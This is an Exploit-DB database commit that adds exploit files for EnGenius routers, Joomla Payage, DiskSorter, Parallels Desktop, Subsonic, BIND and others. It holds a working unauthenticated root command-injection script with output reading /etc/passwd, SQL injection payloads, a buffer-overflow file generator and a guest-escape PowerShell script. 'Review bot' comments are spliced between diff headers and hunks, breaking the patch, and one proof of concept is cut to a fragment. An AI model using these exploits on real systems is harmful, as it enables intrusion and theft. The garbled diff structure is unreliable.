From cd6e21e600ea362e18c43dbb346e4c8d206e824e Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Tue, 6 Jun 2017 05:01:15 +0000 Subject: [PATCH] DB: 2017-06-06 11 new exploits Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow DNSTracer 1.8.1 - Buffer Overflow Parallels Desktop - Virtual Machine Escape Subsonic 6.1.1 - XML External Entity Injection BIND 9.10.5 - Unquoted Service Path Privilege Escalation Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution Joomla! Component Payage 2.05 - 'aid' Parameter SQL Injection EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 - Remote Code Execution Subsonic 6.1.1 - Cross-Site Request Forgery Subsonic 6.1.1 - Server-Side Request Forgery Subsonic 6.1.1 - Cross-Site Request Forgery / Cross-Site Scripting --- files.csv | 12 +- .../hardware/remote/{41874.py => 42122.py} | 0 platforms/hardware/webapps/42114.py | 127 ++++++++++++++++++ platforms/linux/dos/42115.txt | 73 ++++++++++ platforms/php/webapps/42113.txt | 27 ++++ platforms/windows/dos/42112.py | 27 ++++ platforms/windows/local/42116.txt | 57 ++++++++ platforms/windows/local/42119.txt | 102 ++++++++++++++ platforms/windows/local/42121.txt | 90 +++++++++++++ platforms/windows/webapps/42117.txt | 86 ++++++++++++ platforms/windows/webapps/42118.txt | 117 ++++++++++++++++ platforms/windows/webapps/42120.txt | 96 +++++++++++++ 12 files changed, 813 insertions(+), 1 deletion(-) rename platforms/hardware/remote/{41874.py => 42122.py} (100%) create mode 100755 platforms/hardware/webapps/42114.py create mode 100755 platforms/linux/dos/42115.txt create mode 100755 platforms/php/webapps/42113.txt create mode 100755 platforms/windows/dos/42112.py create mode 100755 platforms/windows/local/42116.txt create mode 100755 platforms/windows/local/42119.txt create mode 100755 platforms/windows/local/42121.txt create mode 100755 platforms/windows/webapps/42117.txt create mode 100755 platforms/windows/webapps/42118.txt create mode 100755 platforms/windows/webapps/42120.txt 
diff --git a/files.csv b/files.csv
index 08bccf78e..acfe8f2c2 100644
--- a/files.csv
+++ b/files.csv
@@ -5526,6 +5526,8 @@ id,file,description,date,author,platform,type,port
 42104,platforms/multiple/dos/42104.js,"WebKit JSC - Incorrect Check in emitPutDerivedConstructorToArrowFunctionContextScope",2017-06-01,"Google Security Research",multiple,dos,0
 42108,platforms/multiple/dos/42108.html,"WebKit - 'Element::setAttributeNodeNS' Use-After-Free",2017-06-01,"Google Security Research",multiple,dos,0
 42110,platforms/linux/dos/42110.txt,"reiserfstune 3.6.25 - Local Buffer Overflow",2017-06-02,"Nassim Asrir",linux,dos,0
+42112,platforms/windows/dos/42112.py,"Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow",2017-06-02,n3ckD_,windows,dos,0
+42115,platforms/linux/dos/42115.txt,"DNSTracer 1.8.1 - Buffer Overflow",2017-06-05,FarazPajohan,linux,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -9024,6 +9026,9 @@ id,file,description,date,author,platform,type,port
 42059,platforms/windows/local/42059.py,"Dup Scout Enterprise 9.7.18 - '.xml' Local Buffer Overflow",2017-05-24,ScrR1pTK1dd13,windows,local,0
 42076,platforms/linux/local/42076.py,"JAD java Decompiler 1.5.8e - Local Buffer Overflow",2017-05-26,"Juan Sacco",linux,local,0
 42077,platforms/windows/local/42077.txt,"Microsoft MsMpEng - Multiple Problems Handling ntdll!NtControlChannel Commands",2017-05-26,"Google Security Research",windows,local,0
+42116,platforms/windows/local/42116.txt,"Parallels Desktop - Virtual Machine Escape",2017-06-05,"Mohammad Reza Espargham",windows,local,0
+42119,platforms/windows/local/42119.txt,"Subsonic 6.1.1 - XML External Entity Injection",2017-06-05,hyp3rlinx,windows,local,0
+42121,platforms/windows/local/42121.txt,"BIND 9.10.5 - Unquoted Service Path Privilege Escalation",2017-06-05,hyp3rlinx,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15528,7 +15533,7 @@ id,file,description,date,author,platform,type,port
 41852,platforms/windows/remote/41852.txt,"Moxa MX AOPC-Server 1.5 - XML External Entity Injection",2017-04-10,hyp3rlinx,windows,remote,0
 41861,platforms/linux/remote/41861.py,"Quest Privilege Manager 6.0.0 - Arbitrary File Write",2017-04-10,m0t,linux,remote,0
 41872,platforms/hardware/remote/41872.py,"Cisco Catalyst 2960 IOS 12.2(55)SE11 - 'ROCEM' Remote Code Execution",2017-04-12,"Artem Kondratenko",hardware,remote,23
-41874,platforms/hardware/remote/41874.py,"Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution",2017-04-12,"Artem Kondratenko",hardware,remote,0
+42122,platforms/hardware/remote/42122.py,"Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution",2017-04-12,"Artem Kondratenko",hardware,remote,23
 41892,platforms/linux/remote/41892.sh,"Tenable Appliance < 4.5 - Unauthenticated Root Remote Code Execution",2017-04-18,agix,linux,remote,8000
 41894,platforms/windows/remote/41894.py,"Microsoft Word - '.RTF' Remote Code Execution",2017-04-18,"Bhadresh Patel",windows,remote,0
 41895,platforms/hardware/remote/41895.rb,"Huawei HG532n - Command Injection (Metasploit)",2017-04-19,Metasploit,hardware,remote,0
@@ -37942,3 +37947,8 @@ id,file,description,date,author,platform,type,port
 42105,platforms/multiple/webapps/42105.html,"WebKit - CachedFrame does not Detach Openers Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0
 42106,platforms/multiple/webapps/42106.html,"WebKit - 'CachedFrameBase::restore' Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0
 42107,platforms/multiple/webapps/42107.html,"WebKit - 'Document::prepareForDestruction' and 'CachedFrame' Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0
+42113,platforms/php/webapps/42113.txt,"Joomla! Component Payage 2.05 - 'aid' Parameter SQL Injection",2017-06-03,"Persian Hack Team",php,webapps,0
+42114,platforms/hardware/webapps/42114.py,"EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 - Remote Code Execution",2017-06-04,LiquidWorm,hardware,webapps,0
+42117,platforms/windows/webapps/42117.txt,"Subsonic 6.1.1 - Cross-Site Request Forgery",2017-06-05,hyp3rlinx,windows,webapps,0
+42118,platforms/windows/webapps/42118.txt,"Subsonic 6.1.1 - Server-Side Request Forgery",2017-06-05,hyp3rlinx,windows,webapps,0
+42120,platforms/windows/webapps/42120.txt,"Subsonic 6.1.1 - Cross-Site Request Forgery / Cross-Site Scripting",2017-06-05,hyp3rlinx,windows,webapps,0
diff --git a/platforms/hardware/remote/41874.py b/platforms/hardware/remote/42122.py
similarity index 100%
rename from platforms/hardware/remote/41874.py
rename to platforms/hardware/remote/42122.py
diff --git a/platforms/hardware/webapps/42114.py b/platforms/hardware/webapps/42114.py
new file mode 100755
index 000000000..770c0470c
--- /dev/null
+++ b/platforms/hardware/webapps/42114.py
@@ -0,0 +1,127 @@
+#!/usr/bin/env python
+# coding: utf8
+#
+#
+# EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 Root Remote Code Execution
+#
+#
+# Vendor: EnGenius Technologies Inc.
+# Product web page: https://www.engeniustech.com
+# Affected version: ESR300 (1.4.9, 1.4.7, 1.4.2, 1.4.1.28, 1.4.0, 1.3.1.42, 1.1.0.28)
+# ESR350 (1.4.11, 1.4.9, 1.4.5, 1.4.2, 1.4.0, 1.3.1.41, 1.1.0.29)
+# ESR600 (1.4.11, 1.4.9, 1.4.5, 1.4.3, 1.4.2, 1.4.1, 1.4.0.23, 1.3.1.63, 1.2.1.46, 1.1.0.50)
+# EPG5000 (1.3.9.21, 1.3.7.20, 1.3.3.17, 1.3.3, 1.3.2, 1.3.0, 1.2.0)
+# ESR900 (1.4.5, 1.4.3, 1.4.0, 1.3.5.18 build-12032015@liwei (5668b74), 1.3.1.26, 1.3.0, 1.2.2.23, 1.1.0)
+# ESR1200 (1.4.5, 1.4.3, 1.4.1, 1.3.1.34, 1.1.0)
+# ESR1750 (1.4.5, 1.4.3, 1.4.1, 1.4.0, 1.3.1.34, 1.3.0, 1.2.2.27, 1.1.0)
+#
+# Summary: With the EnGenius IoT Gigabit Routers and free EnShare app, use
+# your iPhone, iPad or Android-based tablet or smartphone to transfer
+# video, music and other files to and from a router-attached USB hard
+# drive. Enshare is a USB media storage sharing application that enables
+# access to files remotely. The EnShare feature allows you to access media
+# content stored on a USB hard drive connected to the router's USB port in
+# the home and when you are away from home when you have access to the Internet.
+# By default the EnShare feature is enabled.
+#
+# EnShareTM supports both FAT32 and NTFS USB formats. Transfer speeds of data
+# from your router-attached USB storage device to a remote/mobile device may
+# vary based on Internet uplink and downlink speeds. The router's design enables
+# users to connect numerous wired and wireless devices to it and supports intensive
+# applications like streaming HD video and sharing of media in the home and accessing
+# media away from the home with EnShare - Your Personal Media Cloud.
+#
+# Desc: EnGenius EnShare suffers from an unauthenticated command injection
+# vulnerability. An attacker can inject and execute arbitrary code as the
+# root user via the 'path' GET/POST parameter parsed by 'usbinteract.cgi'
+# script.
+#
+# =======================================================================
+#
+# bash-4.4$ python enshare.py 10.0.0.17
+# [+] Command: ls -alsh
+# 44 -rwxr-xr-x 1 0 0 42.5K Oct 31 2014 getsize.cgi
+# 4 -rwxr-xr-x 1 0 0 606 Oct 31 2014 languageinfo.cgi
+# 48 -rwxr-xr-x 1 0 0 44.2K Oct 31 2014 upload.cgi
+# 48 -rwxr-xr-x 1 0 0 44.5K Oct 31 2014 usbinfo.cgi
+# 56 -rwxr-xr-x 1 0 0 54.1K Oct 31 2014 usbinteract.cgi
+# 0 drwxr-xr-x 4 0 0 0 Jun 3 00:52 ..
+# 0 drwxr-xr-x 2 0 0 0 Oct 31 2014 .
+#
+# [+] Command: id
+# uid=0(root) gid=0(root)
+#
+# [+] Command: cat /etc/passwd
+#
+# Connecting to 10.0.0.17 port 9000
+#
+# HTTP/1.1 200 OK
+# root: !:0:0:root:/root:/bin/sh
+# administrator: *:65534:65534:administrator:/var:/bin/false
+# admin: *:60000:60000:webaccount:/home:/usr/bin/sh
+# guest: *:60001:60000:webaccount:/home:/usr/bin/sh
+# Content-type: text/html
+# Transfer-Encoding: chunked
+# Date: Sat, 03 Jun 2017 13:48:14 GMT
+# Server: lighttpd/1.4.31
+#
+# 0
+# [+] Command: pwd
+# /www/web/cgi-bin
+# [+] Command: cat /etc/account.conf
+#
+# HTTP/1.1 200 OK
+# 1: admin:admin:4
+# 1: guest:guest:1
+# Content-type: text/html
+# Transfer-Encoding: chunked
+# Date: Sat, 03 Jun 2017 14:53:42 GMT
+# Server: lighttpd/1.4.31
+# bash-4.4$
+#
+# =======================================================================
+#
+# Tested on: Linux 2.6.36 (mips)
+# Embedded HTTP Server ,Firmware Version 5.11
+# lighttpd/1.4.31
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+# @zeroscience
+#
+#
+# Advisory ID: ZSL-2017-5413
+# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5413.php
+#
+#
+# 17.05.2017
+#
+
+
+import sys, socket
+
+if len(sys.argv) < 2:
+ print 'Usage: enshare.py [port]\n'
+ quit()
+
+ip = sys.argv[1]
+port = 9000 if len(sys.argv) < 3 else int(sys.argv[2])
+cmd = raw_input('[+] Command: ')
+
+payload = 'POST /web/cgi-bin/usbinteract.cgi HTTP/1.1\r\n'
+payload += 'Host: {0}:{1}\r\n'
+payload += 'Content-Length: {2}\r\n'
+payload += 'Content-Type: application/x-www-form-urlencoded\r\n\r\n'
+payload += 'action=7&path=\"|{3}||\"'
+
+msg = payload.format( ip, port, len(cmd)+19, cmd )
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+target = (ip, port)
+print >>sys.stderr, '\nConnecting to %s port %s\n' % target
+s.connect(target)
+s.sendall(msg)
+response = s.recv(5000)
+s.close()
+
+print response.strip()
diff --git a/platforms/linux/dos/42115.txt b/platforms/linux/dos/42115.txt
new file mode 100755
index 000000000..2f47447b2
--- /dev/null
+++ b/platforms/linux/dos/42115.txt
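Review bot: The usage line `print 'Usage: enshare.py [port]\n'` omits the required host argument that the script reads two lines later as `sys.argv[1]`; `print 'Usage: enshare.py <ip> [port]\n'` describes what the code actually expects. The Content-Length is computed as `len(cmd)+19`, a hand-counted length of the `action=7&path=...` template that goes stale the moment that string is edited; formatting the body into its own variable and passing `len(body)` removes the magic number. Nothing in the header says the script is Python 2 only, though the `print` statements and `raw_input` make it so; a `# Python 2` note beside the shebang would save a failed run on a current interpreter. For defenders, the request shape documented here — a POST to `usbinteract.cgi` whose `path` value contains shell metacharacters — is the pattern worth alerting on while the affected firmware is in service.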
@@ -0,0 +1,73 @@
+################
+#Exploit Title: DNSTracer Stack-based Buffer Overflow
+#CVE: CVE-2017-9430
+#CWE: CWE-119
+#Exploit Author: Hosein Askari (FarazPajohan)
+#Vendor HomePage: http://www.mavetju.org
+#Version : 1.8.1
+#Tested on: Parrot OS
+#Date: 04-06-2017
+#Category: Application
+#Author Mail : hosein.askari@aol.com
+#Description: Stack-based buffer overflow in dnstracer through 1.9 allows =
+attackers to cause a denial of service (application crash) or possibly hav=
+e unspecified other impact via a command line with a long name argument tha=
+t is mishandled in a strcpy call for argv[0]. An example threat model is a =
+web application that launches dnstracer with an untrusted name string.
+###############################
+
+#dnstracer -v $(python -c 'print "A"*1025')
+*** buffer overflow detected ***: dnstracer terminated
+=3D=3D=3D=3D=3D=3D=3D Backtrace: =3D=3D=3D=3D=3D=3D=3D=3D=3D
+/lib/x86_64-linux-gnu/libc.so.6(+0x70bcb)[0x7ff6e79edbcb]
+/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x37)[0x7ff6e7a76037]
+/lib/x86_64-linux-gnu/libc.so.6(+0xf7170)[0x7ff6e7a74170]
+/lib/x86_64-linux-gnu/libc.so.6(+0xf64d2)[0x7ff6e7a734d2]
+dnstracer(+0x2c8f)[0x5634368aac8f]
+/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf1)[0x7ff6e799d2b1]
+dnstracer(+0x2fca)[0x5634368aafca]
+=3D=3D=3D=3D=3D=3D=3D Memory map: =3D=3D=3D=3D=3D=3D=3D=3D
+5634368a8000-5634368b0000 r-xp 00000000 08:01 4850311 /u=
+sr/bin/dnstracer
+563436aaf000-563436ab0000 r--p 00007000 08:01 4850311 /u=
+sr/bin/dnstracer
+563436ab0000-563436ab1000 rw-p 00008000 08:01 4850311 /u=
+sr/bin/dnstracer
+563436ab1000-563436ab3000 rw-p 00000000 00:00 0=20
+563436c1d000-563436c3e000 rw-p 00000000 00:00 0 [h=
+eap]
+7ff6e7766000-7ff6e777c000 r-xp 00000000 08:01 25823192 /l=
+ib/x86_64-linux-gnu/libgcc_s.so.1
+7ff6e777c000-7ff6e797b000 ---p 00016000 08:01 25823192 /l=
+ib/x86_64-linux-gnu/libgcc_s.so.1
+7ff6e797b000-7ff6e797c000 r--p 00015000 08:01 25823192 /l=
+ib/x86_64-linux-gnu/libgcc_s.so.1
+7ff6e797c000-7ff6e797d000 rw-p 00016000 08:01 25823192 /l=
+ib/x86_64-linux-gnu/libgcc_s.so.1
+7ff6e797d000-7ff6e7b12000 r-xp 00000000 08:01 25823976 /l=
+ib/x86_64-linux-gnu/libc-2.24.so
+7ff6e7b12000-7ff6e7d11000 ---p 00195000 08:01 25823976 /l=
+ib/x86_64-linux-gnu/libc-2.24.so
+7ff6e7d11000-7ff6e7d15000 r--p 00194000 08:01 25823976 /l=
+ib/x86_64-linux-gnu/libc-2.24.so
+7ff6e7d15000-7ff6e7d17000 rw-p 00198000 08:01 25823976 /l=
+ib/x86_64-linux-gnu/libc-2.24.so
+7ff6e7d17000-7ff6e7d1b000 rw-p 00000000 00:00 0=20
+7ff6e7d1b000-7ff6e7d3e000 r-xp 00000000 08:01 25823455 /l=
+ib/x86_64-linux-gnu/ld-2.24.so
+7ff6e7f13000-7ff6e7f15000 rw-p 00000000 00:00 0=20
+7ff6e7f3a000-7ff6e7f3e000 rw-p 00000000 00:00 0=20
+7ff6e7f3e000-7ff6e7f3f000 r--p 00023000 08:01 25823455 /l=
+ib/x86_64-linux-gnu/ld-2.24.so
+7ff6e7f3f000-7ff6e7f40000 rw-p 00024000 08:01 25823455 /l=
+ib/x86_64-linux-gnu/ld-2.24.so
+7ff6e7f40000-7ff6e7f41000 rw-p 00000000 00:00 0=20
+7ffded62d000-7ffded64e000 rw-p 00000000 00:00 0 [s=
+tack]
+7ffded767000-7ffded769000 r--p 00000000 00:00 0 [v=
+var]
+7ffded769000-7ffded76b000 r-xp 00000000 00:00 0 [v=
+dso]
+ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [v=
+syscall]
+Aborted
diff --git a/platforms/php/webapps/42113.txt b/platforms/php/webapps/42113.txt
new file mode 100755
index 000000000..9aba5084f
--- /dev/null
+++ b/platforms/php/webapps/42113.txt
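Review bot: The advisory text was committed still quoted-printable encoded — the `=3D` runs that should be `=` in the `Backtrace:` and `Memory map:` banners, the `=20` trailing-space codes, and the `=` soft breaks that split `/usr/bin/dnstracer` into `/u=` and `sr/bin/dnstracer` — so the crash output is not readable as stored; decoding it (Python's `quopri` module does this) before indexing would restore one mapping per line. The header also disagrees with itself about scope: `#Version : 1.8.1` on one line, `dnstracer through 1.9` in the description, and files.csv indexes the entry as 1.8.1; stating which version the backtrace was produced on would resolve it. The sentence `An example threat model is a web application that launches dnstracer with an untrusted name string` is the one line that tells a defender when this matters, and it would be more visible as its own `#Impact:` field than buried at the end of `#Description:`.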
@@ -0,0 +1,27 @@
+# Exploit Title: Joomla Payage 2.05 - SQL Injection
+# Exploit Author: Persian Hack Team
+# Discovered by : Mojtaba MobhaM (Mojtaba Kazemi)
+# Vendor Home : https://extensions.joomla.org/extensions/extension/e-commerce/payment-systems/payage/
+# My Home : http://persian-team.ir/
+# Google Dork : inurl:index.php?option=com_payage
+# Telegram Channel: @PersianHackTeam
+# Tested on: Linux
+# Date: 2017-06-03
+
+# POC :
+# SQL Injection :
+
+Parameter: aid (GET)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: option=com_payage&task=make_payment&aid=1001' AND 6552=6552 AND 'dCgx'='dCgx&tid=c4333ccdc8b2dced3f6e72511cd8a76f&tokenid=
+
+ Type: AND/OR time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
+ Payload: option=com_payage&task=make_payment&aid=1001' AND (SELECT * FROM (SELECT(SLEEP(5)))JBKV) AND 'XFWL'='XFWL&tid=c4333ccdc8b2dced3f6e72511cd8a76f&tokenid=
+---
+
+http://server/index.php?option=com_payage&task=make_payment&aid=[SQL]&tid=c4333ccdc8b2dced3f6e72511cd8a76f&tokenid=
+
+# Greetz : T3NZOG4N & FireKernel
+# Iranian White Hat Hackers
diff --git a/platforms/windows/dos/42112.py b/platforms/windows/dos/42112.py
new file mode 100755
index 000000000..8a63e8aaa
--- /dev/null
+++ b/platforms/windows/dos/42112.py
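Review bot: The advisory carries no disclosure status — no vendor-notification date, fixed version, or statement that Payage 2.05 remains unpatched — while every other advisory in this commit has a `Disclosure Timeline` section; without it a site owner cannot tell whether updating the component resolves the `aid` injection. `Tested on: Linux` names only the host OS; recording the Joomla and MySQL versions would let a reader judge whether the `MySQL >= 5.0.12` time-based variant applies to their stack.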
@@ -0,0 +1,27 @@
+#!/usr/bin/python
+
+######################################
+# Exploit Title: DiskSorter v9.7.14 - Input Directory Local Buffer Overflow - PoC
+# Date: 25 May 2017
+# Exploit Author: n3ckD_
+# Vendor Homepage: http://www.disksorter.com/
+# Software Link: http://www.disksorter.com/setups/disksorter_setup_v9.7.14.exe
+# Version: Disk Sorter v9.7.14 (32-Bit)
+# Tested on: Windows 7 Enterprise SP1 (Build 7601)
+# Usage: Run the exploit, copy the text of the poc.txt into the 'Inputs -> Add Input Directory' dialog
+######################################
+
+print "DiskSorter v9.7.14 (32-Bit) - Input Directory Local Buffer Overflow - PoC"
+print "Copy the text of poc.txt into the 'Inputs -> Add Input Directory' dialog"
+
+# in libspg:.text
+# 10147C1C 58 POP EAX
+# 10147C1D C3 RETN
+ret = "\x1c\x7c\x14\x10"
+
+nops = "\x47\x4F"*24
+buf = nops + "A"*4048 + ret + "MAGIC" + "\n"
+
+f = open("poc.txt","w")
+f.write(buf)
+f.close()
\ No newline at end of file
diff --git a/platforms/windows/local/42116.txt b/platforms/windows/local/42116.txt
new file mode 100755
index 000000000..deff45020
--- /dev/null
+++ b/platforms/windows/local/42116.txt
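Review bot: `f = open("poc.txt","w")` followed by `f.write(buf)` and `f.close()` leaves the handle open if the write raises; `with open("poc.txt", "w") as f:` with `f.write(buf)` indented under it closes it on every path. The name `nops` is misleading for `"\x47\x4F"*24`: those bytes are an `inc edi` / `dec edi` pair (net effect nil, but not `\x90` NOPs), so a comment such as `# inc edi / dec edi pairs used as filler` would stop the next reader from assuming a classic NOP sled. The script is Python 2 only (`print` statements) and the header does not say so; a `# Python 2` line beside the shebang would be enough. The file also ends without a trailing newline, as the `\ No newline at end of file` marker shows.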
@@ -0,0 +1,57 @@
+#[+] Title:  Parallels Desktop - Virtual Machine Escape
+#[+] Product: Parallels
+#[+] Vendor: http://www.parallels.com/products/desktop/
+#[+] Affected Versions: All Version
+#
+#
+# Author      :   Mohammad Reza Espargham
+# Linkedin    :   https://ir.linkedin.com/in/rezasp
+# E-Mail      :   me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
+# Website     :   www.reza.es
+# Twitter     :   https://twitter.com/rezesp
+# FaceBook    :   https://www.facebook.com/reza.espargham
+# Github : github.com/rezasp
+# youtube : https://youtu.be/_nZ4y0ZTrwA
+#
+#
+
+#There is a security issue in the shared folder implementation in Parallels Desktop
+#DLL : PrlToolsShellExt.dll 10.2.0 (28956)
+#prl_tg Driver
+
+
+#Very simple exploit with powershell
+#powershell.exe poc.ps1
+
+#Write OSX Executable file in temp
+[io.file]::WriteAllText($env:temp + '\r3z4.command',"Say 'You are hacked by 1337'")
+
+
+add-type -AssemblyName microsoft.VisualBasic
+
+add-type -AssemblyName System.Windows.Forms
+
+#open temp in explorer
+explorer $env:temp
+
+#wait for 500 miliseconds
+start-sleep -Milliseconds 500
+
+#select Temp active window
+[Microsoft.VisualBasic.Interaction]::AppActivate("Temp")
+
+#find r3z4.command file
+[System.Windows.Forms.SendKeys]::SendWait("r3z4")
+
+#right click
+[System.Windows.Forms.SendKeys]::SendWait("+({F10})")
+
+#goto "Open on Mac" in menu
+[System.Windows.Forms.SendKeys]::SendWait("{DOWN}")
+[System.Windows.Forms.SendKeys]::SendWait("{DOWN}")
+[System.Windows.Forms.SendKeys]::SendWait("{DOWN}")
+
+#Click Enter
+[System.Windows.Forms.SendKeys]::SendWait("~")
+
+#Enjoy ;)s
\ No newline at end of file
diff --git a/platforms/windows/local/42119.txt b/platforms/windows/local/42119.txt
new file mode 100755
index 000000000..5fb7ba719
--- /dev/null
+++ b/platforms/windows/local/42119.txt
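Review bot: The advisory never states what the vulnerability is: it names `PrlToolsShellExt.dll 10.2.0 (28956)` and the `prl_tg` driver, and the script writes a `.command` file to `$env:temp` and then drives the `Open on Mac` context-menu entry with `SendKeys`, but the implied claim — that the host side ends up running a guest-written file — is never written down, nor which boundary the shared-folder implementation was supposed to enforce; a `Security Issue:` paragraph in the style of the other advisories in this commit is missing. `#[+] Affected Versions: All Version` is not supported by the file, which records a single DLL build; it should say that build was tested and leave the wider claim to the vendor. There is no vendor-notification date or fix status either, so a reader cannot tell whether updating Parallels Tools helps. Minor wording: `miliseconds` and the stray `s` in `#Enjoy ;)s`.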
@@ -0,0 +1,102 @@
+[+] Credits: John Page a.k.a hyp3rlinx
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/SUBSONIC-XML-EXTERNAL-ENITITY.txt
+[+] ISR: ApparitionSec
+
+
+
+Vendor:
+================
+www.subsonic.org
+
+
+
+Product:
+===============
+subsonic v6.1.1
+
+Subsonic is a media streaming server. You install it on your own computer where you keep your music or video collection.
+
+
+
+Vulnerability Type:
+====================
+XML External Entity
+
+
+
+CVE Reference:
+==============
+CVE-2017-9355
+
+
+
+
+Security Issue:
+================
+subsonic import playlist feature is succeptible to XML External Entity attack. To exploit a User must be tricked to
+import a malicious .XSPF playlist file. The XXE injection can be used to target various hosts from the internal network
+to bypass Firewall or from the internet as XML External Entity is related to Server Side Request Forgery (SSRF) attacks.
+
+
+
+
+Exploit/POC:
+=============
+1) Create some playlist file "RainbowsNUnic0rns.xspf"
+
+
+
+%mmmm;]>
+
+
+2) Import as playlist.
+
+
+3) Start listener.
+
+nc.exe -llvp 1337
+listening on [any] 1337 ...
+
+connect to [127.0.0.1] from USER-PC [127.0.0.1] 64428
+GET / HTTP/1.1
+Cache-Control: no-cache
+Pragma: no-cache
+User-Agent: Java/1.8.0_45
+Host: 127.0.0.1:1337
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: keep-alive
+
+
+
+Network Access:
+===============
+Remote
+
+
+
+
+Severity:
+=========
+High
+
+
+
+Disclosure Timeline:
+==================================
+Vendor Notification: May 29, 2017
+Vendor Acknowledgement: May 30, 2017
+June 4, 2017 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/platforms/windows/local/42121.txt b/platforms/windows/local/42121.txt
new file mode 100755
index 000000000..4f4120cba
--- /dev/null
+++ b/platforms/windows/local/42121.txt
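Review bot: Step 1 of `Exploit/POC:`, which should hold the `RainbowsNUnic0rns.xspf` playlist, is reduced here to the single fragment `%mmmm;]>` — the XML declaration, DOCTYPE and entity definition are absent, so the proof cannot be followed as written. This may be a rendering artefact rather than the committed content, but the file should be checked, and the same check applies to 42117.txt, 42118.txt and 42120.txt later in this commit, whose `Exploit/POC:` sections render as runs of empty lines where the HTML forms presumably were. The `Security Issue:` text has a typo (`succeptible`), and the source URL's `ENITITY` should be confirmed against the author's site before the link is indexed. A remediation line — parse imported playlists with external entity resolution disabled — would make the advisory actionable for Subsonic operators rather than only for testers.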
@@ -0,0 +1,90 @@
+[+] Credits: John Page aka hyp3rlinx
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/BIND9-PRIVILEGE-ESCALATION.txt
+[+] ISR: ApparitionSec
+
+
+
+Vendor:
+===========
+www.isc.org
+
+
+
+Product:
+===========
+BIND9
+v9.10.5 x86 / x64
+
+
+BIND is open source software that enables you to publish your Domain Name System (DNS) information on the Internet, and to resolve DNS
+queries for your users. The name BIND stands for “Berkeley Internet Name Domain”, because the software originated in the early 1980s
+at the University of California at Berkeley.
+
+
+
+Vulnerability Type:
+===================
+Privilege Escalation
+
+
+
+CVE Reference:
+==============
+CVE-2017-3141
+
+
+
+Security Issue:
+================
+BIND installs as a service with an unquoted service path, to exploit a local attacker must place
+a malicious executable file named "Program.exe" in the path of the service, if the process runs under
+some account other than the attackers it can be used to exec code under a different set of privileges.
+
+
+C:\>sc qc named
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: named
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\ISC BIND 9\bin\named.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : ISC BIND
+ DEPENDENCIES :
+ SERVICE_START_NAME : .\named
+
+
+
+
+
+Network Access:
+===============
+Local
+
+
+
+
+Severity:
+=========
+Medium
+
+
+
+Disclosure Timeline:
+==================================
+Vendor Notification: May 13, 2017
+Vendor confirm: May 14, 2017
+June 4, 2017 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
\ No newline at end of file
diff --git a/platforms/windows/webapps/42117.txt b/platforms/windows/webapps/42117.txt
new file mode 100755
index 000000000..4b2c48b75
--- /dev/null
+++ b/platforms/windows/webapps/42117.txt
@@ -0,0 +1,86 @@
+[+] Credits: John Page a.k.a hyp3rlinx
